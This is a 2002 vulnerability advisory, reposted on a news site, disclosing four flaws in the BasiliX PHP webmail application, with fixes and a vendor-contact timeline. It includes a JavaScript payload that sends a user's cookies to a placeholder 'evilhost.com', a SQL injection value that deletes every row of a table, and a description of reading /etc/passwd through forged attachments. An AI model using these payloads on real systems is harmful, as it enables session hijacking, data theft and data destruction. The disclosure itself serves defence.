Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » BasiliX multiple vulnerabilities

BasiliX multiple vulnerabilities

by Nikola Strahija on June 19th, 2002 "BasiliX is a webmail application based on PHP and IMAP, and powered with the MySQL database server. It supports simple mail actions, sending/receiving attachments, an addressbook with group capability, settings utility, multiple languages, multiple folders and themes." (direct quote from the program's project page at Freshmeat) It is published under the terms of the GNU General Public License.


SECURITY HOLES:

1) The attachment capability in Compose Mail can be fooled into treating any
file on the web server as the uploaded file. This means that it is easy to
steal sensitive information on that server (like the /etc/passwd file), and
mail it off to someone.

When uploading files, PHP sets some global variables, one of which gives the
temporary location where the uploaded file was stored. PHP usually also sets
global variables with GET or POST form data. BasiliX doesn't check if the
attachment really was uploaded by the user, or if it just was some POST data
with the same format.

This issue can be fixed by using the is_uploaded_file() function, to see if a
file was in fact uploaded.

2) The program has got some cross-site scripting issues. In mail folders, in
Find Mail and when you read a message, the Subject mail header is shown
without removing any HTML tags. When a message is read, the mail body is also
shown without removing any HTML tags. This means that an attacker can include
JavaScript code in an e-mail message, and that it will be executed in the
user's browser when he or she looks at that message.

This can be used for stealing a user's cookies, to allow the attacker to take
over the user's session, by including JavaScript code like this:

self.location.href="http://evilhost.com/evil?"+escape(document.
cookie)

It can also be used as a form of Denial of Service attack. If there is a
message in your inbox folder that immediately redirects your browser to
Slashdot as soon as you enter that folder, it gets rather hard to read your
e-mail.

This can be fixed by always using the htmlspecialchars() function when
printing variables that shouldn't contain HTML tags.

3) The attached files are saved in /tmp/BasiliX. They are readable by all
users, and it seems like they never get deleted. This means that anyone who
has got shell access to the server, or who can upload web scripts to it, can
read all files any user has ever attached to an e-mail.

4) BasiliX has got some SQL Injection holes. If you have an SQL statement
where data from outside is not placed in apostrophes or quotes, like this:

DELETE FROM table WHERE id=$id

you can wipe all rows in the table by giving $id the value "id". This will
execute the statement:

DELETE FROM table WHERE id=id

The way to fix this is to put all outside data in apostrophes or quotes, like
this:

DELETE FROM table WHERE id='$id'

or to use PHP's is_numeric() function.


COMMUNICATION WITH VENDOR:

The vendor was contacted on the 19th of May. He replied, and we discussed
these issues in a couple of mails. I haven't heard from him since the 26th of
May. No fixed version has been released yet.

To be fair to Murat, he had some excuse for not working on the program. On the
other hand, I think that the users of BasiliX want a secure mail program and
not just excuses.


// Ulf Harnhammar
[email protected]



Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »